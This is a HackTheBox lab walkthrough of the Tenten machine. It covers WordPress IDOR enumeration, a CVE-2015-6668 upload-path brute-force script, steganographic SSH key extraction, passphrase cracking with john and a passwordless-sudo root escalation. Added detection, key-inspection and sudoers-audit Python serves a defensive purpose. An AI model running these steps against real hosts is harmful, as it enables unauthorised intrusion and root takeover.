Tenten is a medium-difficulty HackTheBox machine. The topics it covers are exploitation of a WordPress plugin, cracking an SSH private-key passphrase, logging in over SSH with a private key, and sudo privilege escalation. Interested readers can work through it on HackTheBox.
Walkthrough mind map (figure)
0x01 Reconnaissance
Port scanning
Start with an nmap port scan:
nmap -Pn -p- -sV -sC -A 10.10.10.10 -oA nmap_Tenten
The scan shows that only ports 22 and 80 are open.
Port 80
The site redirects to tenten.htb, so the name has to be resolved via the hosts file:
vim /etc/hosts   # add: 10.10.10.10 tenten.htb
Visiting the page again shows a WordPress site titled Job Portal.
The only post on the site is the default Hello world! post.
Clicking Job Listing opens the job descriptions; the position currently advertised is penetration tester.
Clicking Apply Now opens an application form asking for name, email, address and other details:
http://tenten.htb/index.php/jobs/apply/8/
There is a file upload field for the CV, but submitting the form with a PHP script attached only produces an error.
Changing the 8 in the application URL to 1 changes the page title from Pen Tester to Hello world!: the numeric ID in the URL is used directly to look up the post.
http://tenten.htb/index.php/jobs/apply/1/
grep and cut extract the title from the page:
curl -s http://tenten.htb/index.php/jobs/apply/8/ | grep "entry-title" | cut -d ">" -f2 | cut -d "<" -f1
Loop over the ID in the URL:
for i in $(seq 1 25); do echo -n "$i: "; curl -s http://tenten.htb/index.php/jobs/apply/$i/ | grep "entry-title" | cut -d ">" -f2 | cut -d "<" -f1; done
This yields the following titles:
1: Job Application: Hello world!
2: Job Application: Sample Page
3: Job Application: Auto Draft
5: Job Application: Jobs Listing
6: Job Application: Job Application
7: Job Application: Register
8: Job Application: Pen Tester
10: Job Application: Application
11: Job Application: cube
12: Job Application: Application
13: Job Application: HackerAccessGranted
14: Job Application: Application
Directory scanning
WordPress is an open-source content management system (CMS) used to build websites, blogs and applications. It offers a user-friendly interface for creating and managing content and a large ecosystem of plugins and themes that extend its functionality.
Scanning the site with gobuster turns up only the standard WordPress directories and files:
gobuster dir -u http://tenten.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 100 --no-error
Vulnerability scanning
wpscan, which specialises in WordPress, reports that the theme is twentyseventeen:
wpscan --url http://tenten.htb --api-token <WPSCAN_API_TOKEN> -e
It also finds a plugin, Job Manager, with two known vulnerabilities: an IDOR and an XSS.
wpscan additionally enumerates the username takis.
0x02 Foothold [takis]
Job Manager plugin
WordPress is one of the most widely used site-building platforms in the world, and its weaknesses are usually found in plugins; the only plugin on this site is Job Manager, in which wpscan found two vulnerabilities. The XSS is of no use in this environment, so we focus on CVE-2015-6668, a CV filename disclosure. The PoC, modified to iterate over the titles enumerated above, is as follows:
Script address: https://github.com/k4u5h41/CVE-2015-6668
import requests

print("""
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
""")

website = input('Enter a vulnerable website: ')
# filename = input('Enter a file name: ')
# The titles enumerated through the IDOR above are tried as file names
filenames = ["Hello world!", "Sample Page", "Auto Draft", "Jobs Listing", "Job Application",
             "Register", "Pen Tester", "Application", "cube", "HackerAccessGranted"]

for filename in filenames:
    filename2 = filename.replace(" ", "-")
    for year in range(2013, 2018):
        for i in range(1, 13):
            for extension in ('jpg', 'jpeg', 'docx'):
                URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
                req = requests.get(URL)
                if req.status_code == 200:
                    print("[+] URL of CV found! " + URL)
The script finds the following file. The image looks like a steganography candidate:
http://tenten.htb/wp-content/uploads/2017/04/HackerAccessGranted.jpg
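Both steps above leave a distinctive trail in the web server's access log: one client walking many application IDs in sequence, and one client collecting a burst of 404s under /wp-content/uploads/ while guessing upload paths. The following Python is an added example, not code from the write-up or from WordPress, that parses Apache combined-format log lines and flags both patterns per client IP. The log lines are constructed for the example and the URL layout is assumed from the page.

```python
import re
from collections import defaultdict

# Constructed sample access log (Apache "combined" format). These lines are made up for
# this example; they mimic an ID-walking loop and upload-path guessing against the job portal.
SAMPLE_LOG = """\
192.168.1.20 - - [10/May/2017:12:00:00 +0000] "GET /index.php/jobs/apply/8/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [10/May/2017:12:00:01 +0000] "GET /index.php/jobs/apply/1/ HTTP/1.1" 200 5120 "-" "curl/7.52.1"
10.10.14.5 - - [10/May/2017:12:00:01 +0000] "GET /index.php/jobs/apply/2/ HTTP/1.1" 200 5120 "-" "curl/7.52.1"
10.10.14.5 - - [10/May/2017:12:00:02 +0000] "GET /index.php/jobs/apply/3/ HTTP/1.1" 200 5120 "-" "curl/7.52.1"
10.10.14.5 - - [10/May/2017:12:00:02 +0000] "GET /index.php/jobs/apply/4/ HTTP/1.1" 404 1024 "-" "curl/7.52.1"
10.10.14.5 - - [10/May/2017:12:00:03 +0000] "GET /index.php/jobs/apply/5/ HTTP/1.1" 200 5120 "-" "curl/7.52.1"
10.10.14.5 - - [10/May/2017:12:00:03 +0000] "GET /index.php/jobs/apply/6/ HTTP/1.1" 200 5120 "-" "curl/7.52.1"
10.10.14.6 - - [10/May/2017:12:05:00 +0000] "GET /wp-content/uploads/2013/01/Pen-Tester.jpg HTTP/1.1" 404 300 "-" "python-requests/2.18"
10.10.14.6 - - [10/May/2017:12:05:00 +0000] "GET /wp-content/uploads/2013/02/Pen-Tester.jpg HTTP/1.1" 404 300 "-" "python-requests/2.18"
10.10.14.6 - - [10/May/2017:12:05:01 +0000] "GET /wp-content/uploads/2013/03/Pen-Tester.jpg HTTP/1.1" 404 300 "-" "python-requests/2.18"
10.10.14.6 - - [10/May/2017:12:05:01 +0000] "GET /wp-content/uploads/2013/04/Pen-Tester.jpg HTTP/1.1" 404 300 "-" "python-requests/2.18"
10.10.14.6 - - [10/May/2017:12:05:02 +0000] "GET /wp-content/uploads/2013/05/Pen-Tester.jpg HTTP/1.1" 404 300 "-" "python-requests/2.18"
10.10.14.6 - - [10/May/2017:12:05:02 +0000] "GET /wp-content/uploads/2017/04/HackerAccessGranted.jpg HTTP/1.1" 200 70000 "-" "python-requests/2.18"
"""

# Apache combined format: client, identity, user, [timestamp], "METHOD path proto", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Job Manager application URL with its numeric post ID (URL layout taken from the page).
APPLY_RE = re.compile(r"^/index\.php/jobs/apply/(\d+)/?$")
UPLOADS_PREFIX = "/wp-content/uploads/"


def parse_log(text):
    """Parse access-log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            events.append({"ip": m["ip"], "path": m["path"], "status": int(m["status"])})
    return events


def detect_enumeration(events, id_threshold=5, miss_threshold=5):
    """Return {client_ip: [(finding, count), ...]} for two enumeration patterns:
    - one client requesting many distinct application IDs (IDOR walking), and
    - one client accumulating many 404s under /wp-content/uploads/ (upload-path guessing).
    The thresholds are tuning knobs: a real applicant rarely opens five different IDs."""
    apply_ids = defaultdict(set)
    upload_misses = defaultdict(int)
    for ev in events:
        m = APPLY_RE.match(ev["path"])
        if m:
            apply_ids[ev["ip"]].add(int(m.group(1)))
        elif ev["path"].startswith(UPLOADS_PREFIX) and ev["status"] == 404:
            upload_misses[ev["ip"]] += 1

    findings = defaultdict(list)
    for ip, ids in apply_ids.items():
        if len(ids) >= id_threshold:
            findings[ip].append(("idor_enumeration", len(ids)))
    for ip, misses in upload_misses.items():
        if misses >= miss_threshold:
            findings[ip].append(("upload_path_bruteforce", misses))
    return dict(findings)


if __name__ == "__main__":
    for ip, hits in detect_enumeration(parse_log(SAMPLE_LOG)).items():
        for name, count in hits:
            print(f"{ip}: {name} ({count})")
```

The 404 counter matters more than the single 200 that ends the upload-guessing run: by the time the real file is hit, a few dozen misses from the same client have already been logged, which is where an alert should fire.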
SSH key passphrase cracking
steghide extracts a file named id_rsa from the image:
steghide extract -sf HackerAccessGranted.jpg
id_rsa is the conventional file name for an SSH private key:
cat id_rsa
Convert id_rsa into a hash that john can crack with ssh2john:
python /usr/share/john/ssh2john.py id_rsa > id_rsa.john
john cracks the passphrase: superpassword
john id_rsa.john --wordlist=/usr/share/wordlists/rockyou.txt
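The passphrase fell to a wordlist because it was weak, and the legacy PEM key format makes every guess cheap: its key-derivation is a single MD5 pass, whereas the newer openssh-key-v1 format uses bcrypt with a configurable round count. The following Python is an added example, not from the write-up, that inspects a private-key file and reports its format, whether it is encrypted, and which KDF protects it. Both fixtures are constructed: a legacy PEM header with a placeholder body, and the leading fields of an openssh-key-v1 blob produced by a small builder; no real key material is involved.

```python
import base64
import struct

MAGIC = b"openssh-key-v1\x00"


def _ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH 'string': 4-byte big-endian length followed by the payload."""
    return struct.pack(">I", len(data)) + data


def _read_string(blob: bytes, off: int):
    """Decode an SSH 'string' at offset off; return (payload, new_offset)."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def build_openssh_v1_header(cipher: str, kdf: str, rounds: int = 16) -> str:
    """Constructed fixture: only the leading fields of an openssh-key-v1 blob (magic, ciphername,
    kdfname, kdfoptions, nkeys). No key material follows, so this is not a usable key."""
    kdfopts = b""
    if kdf == "bcrypt":
        kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)  # salt + rounds
    blob = (MAGIC + _ssh_string(cipher.encode()) + _ssh_string(kdf.encode())
            + _ssh_string(kdfopts) + struct.pack(">I", 1))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed fixture: legacy PEM headers as written by older ssh-keygen; body is a placeholder.
LEGACY_ENCRYPTED_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

PLACEHOLDER-BODY-NOT-A-REAL-KEY
-----END RSA PRIVATE KEY-----
"""


def inspect_private_key(text: str) -> dict:
    """Report format, encryption status, cipher and KDF of a PEM-framed OpenSSH private key."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if len(lines) < 2 or not lines[0].startswith("-----BEGIN ") or not lines[-1].startswith("-----END "):
        raise ValueError("not a PEM-framed private key")

    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(MAGIC))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "kdf_rounds": rounds}

    # Legacy PEM: encryption is signalled by RFC 1421 headers; the key is derived from the
    # passphrase with OpenSSL's EVP_BytesToKey (one MD5 iteration), which is very fast to guess.
    headers = {}
    for ln in lines[1:]:
        if not ln:
            break
        if ":" in ln:
            k, v = ln.split(":", 1)
            headers[k.strip()] = v.strip()
    encrypted = headers.get("Proc-Type", "").endswith("ENCRYPTED")
    cipher = headers["DEK-Info"].split(",")[0] if encrypted else "none"
    return {"format": "legacy-pem", "encrypted": encrypted, "cipher": cipher,
            "kdf": "md5-evp-bytestokey" if encrypted else "none",
            "kdf_rounds": 1 if encrypted else None}


def assess(info: dict) -> str:
    """One-line risk statement for a key description returned by inspect_private_key()."""
    if not info["encrypted"]:
        return "unencrypted: anyone holding the file can log in"
    if info["format"] == "legacy-pem":
        return "weak: single-MD5 KDF, offline passphrase guessing is cheap"
    if info["kdf"] == "bcrypt" and info["kdf_rounds"] and info["kdf_rounds"] >= 16:
        return "ok: bcrypt KDF with %d rounds slows offline guessing" % info["kdf_rounds"]
    return "weak: low-cost KDF"
```

Regenerating keys in the new format with a higher round count (`ssh-keygen -o -a <rounds>`) raises the per-guess cost, but it does not rescue a passphrase that is in rockyou; the check above tells you which of the two problems a leaked key has.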
SSH private key login
Try logging in with the private key; first restrict its permissions to 400, since ssh refuses to use a key readable by other users:
chmod 400 id_rsa
Log in as takis with the private key, entering the cracked passphrase when prompted:
ssh -i id_rsa takis@10.10.10.10
The first flag is in the user's home directory:
cat user.txt
0x03 Privilege escalation [root]
Information gathering
Checking the current user's sudo rights shows that takis may run any command as root, but only after entering his own password; the one exception is /bin/fuckin, which sudo runs without a password.
sudo -l
/bin/fuckin is a Bash script that takes four arguments:
cat /bin/fuckin
Test-run fuckin:
/bin/fuckin echo mac
sudo privilege escalation
Since fuckin runs under sudo without a password, passing it the command id shows that its arguments are executed as root:
sudo /bin/fuckin id
A root shell follows:
sudo /bin/fuckin /bin/bash
The second flag is in /root:
cat /root/root.txt
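A NOPASSWD rule is only as safe as what the command does with the arguments the caller supplies; a wrapper that executes its arguments is a root shell with extra steps. The following Python is an added example, not from the write-up, that audits a sudoers file for NOPASSWD rules and flags commands that are shells, that are ALL, or that are scripts executing their positional parameters. The sudoers content is constructed for the example, and since the page only says /bin/fuckin is a Bash script taking four arguments, the script body used here is a stand-in with that property rather than the box's actual file.

```python
import re

# Constructed sample sudoers; the NOPASSWD rule for takis mirrors what sudo -l reported above.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
takis   ALL=(ALL) ALL
takis   ALL=(ALL) NOPASSWD: /bin/fuckin
www-data ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart
"""

# Constructed stand-in for the wrapper script's contents (the page does not print the file).
# Any script that runs its arguments has the same property; None marks a compiled binary.
SAMPLE_SCRIPTS = {
    "/bin/fuckin": "#!/bin/bash\n$1 $2 $3 $4\n",
    "/usr/sbin/service": None,
}

# user  host=(runas) [TAG: ...] command[, command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "/usr/bin/sh", "/usr/bin/bash"}
# "$@", $@, $*, $1..$9, ${1}..: positional parameters being expanded into a command line
ARG_PASSTHROUGH_RE = re.compile(r'"\$@"|\$@|\$\*|\$\{?[1-9]')
DIRECTIVES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_sudoers(text):
    """Return user-specification rules as dicts; Defaults, aliases and comments are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(DIRECTIVES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
        rules.append({
            "user": m["user"], "host": m["host"], "runas": m["runas"],
            "nopasswd": "NOPASSWD" in tags,
            "commands": [c.strip() for c in m["cmds"].split(",")],
        })
    return rules


def audit(rules, scripts):
    """Return (user, command, reason) for every NOPASSWD command that hands root to the caller."""
    findings = []
    for r in rules:
        if not r["nopasswd"]:
            continue
        for cmd in r["commands"]:
            if cmd == "ALL":
                findings.append((r["user"], cmd, "NOPASSWD on ALL: unrestricted root without a password"))
                continue
            argv = cmd.split()
            path = argv[0]
            if path in SHELLS:
                findings.append((r["user"], cmd, "NOPASSWD on a shell"))
                continue
            body = scripts.get(path)
            if body and ARG_PASSTHROUGH_RE.search(body):
                findings.append((r["user"], cmd,
                                 "NOPASSWD on a script that executes its arguments: equivalent to a root shell"))
            elif len(argv) == 1 and body is None:
                findings.append((r["user"], cmd,
                                 "NOPASSWD command with no fixed arguments: review what it does with caller input"))
    return findings


if __name__ == "__main__":
    for user, cmd, reason in audit(parse_sudoers(SAMPLE_SUDOERS), SAMPLE_SCRIPTS):
        print(f"{user}: {cmd}: {reason}")
```

On a real host the script bodies come from reading each command path, and the www-data rule passes only because its arguments are fixed in the sudoers entry; a sudoers rule that names a bare binary leaves the whole argument vector to the caller.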
0x04 Summary
Tenten translates as "two tens", which may be a nod to the "twenty" in the WordPress theme twentyseventeen. Reconnaissance shows that the target runs WordPress, and a quick look at the site shows that its main function is job recruitment. wpscan finds the username takis and the Job Manager plugin, which has two vulnerabilities, an XSS and an IDOR. Using the IDOR to enumerate application titles and then searching for the corresponding uploaded CVs, I found an image containing steganography.
Analysing the image with steghide yields the SSH private key id_rsa. The key cannot be used directly because it is passphrase-protected, so it is converted into a crackable hash with ssh2john and the plaintext passphrase is recovered with john. That passphrase completes the SSH private-key login and gives user access. Checking the user's sudo rights on the server shows that /bin/fuckin can be run via sudo without a password, and running /bin/fuckin through sudo escalates to root.